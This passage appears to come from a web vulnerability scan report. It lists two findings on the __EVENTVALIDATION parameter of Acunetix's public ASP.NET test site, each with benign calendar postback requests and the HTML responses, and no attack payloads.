site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8192&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA5H9PR9oIZGRkxnHz5kQrYg1S0TTmHMlIOym%2B648%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQhIcJArrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzDzw0xXJUaMtGmgHD9FCcM001Uo7U
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:46 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBA5H9PR9oIZGRkxnHz5kQrYg1S0TTmHMlIOym+648=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQhIcJArrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzDzw0xXJUaMtGmgHD9FCcM001Uo7U" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:White" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8260&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBA%2B8O%2BfNoIZGRkZXPxN1G31ZhxWThayRTY%2FekanCU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQrv%2B2BgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DqoEKqM03ZVzcpjNOAH%2BiTBWP%2F7s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:56 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBA+8O+fNoIZGRkZXPxN1G31ZhxWThayRTY/ekanCU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQrv+2BgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DqoEKqM03ZVzcpjNOAH+iTBWP/7s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:White" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
